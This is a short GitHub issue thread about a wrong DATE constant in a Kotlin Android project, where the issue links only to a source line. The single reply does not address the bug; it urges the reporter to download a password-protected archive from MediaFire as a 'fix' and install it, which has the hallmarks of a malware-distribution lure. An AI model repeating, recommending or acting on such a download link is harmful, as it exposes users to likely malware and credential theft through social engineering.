### ISSUE TITLE
Wrong DATE constant

### ISSUE THREAD

**Issue by JackEblan** [JackEblan/SocialWorkReviewer#33]
https://github.com/JackEblan/SocialWorkReviewer/blob/d0d174d1e33dd2e9e1f0b9328cd11aa3a3c52a91/core/network/src/main/kotlin/com/eblan/socialworkreviewer/core/network/firestore/DefaultAboutDataSource.kt#L38

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
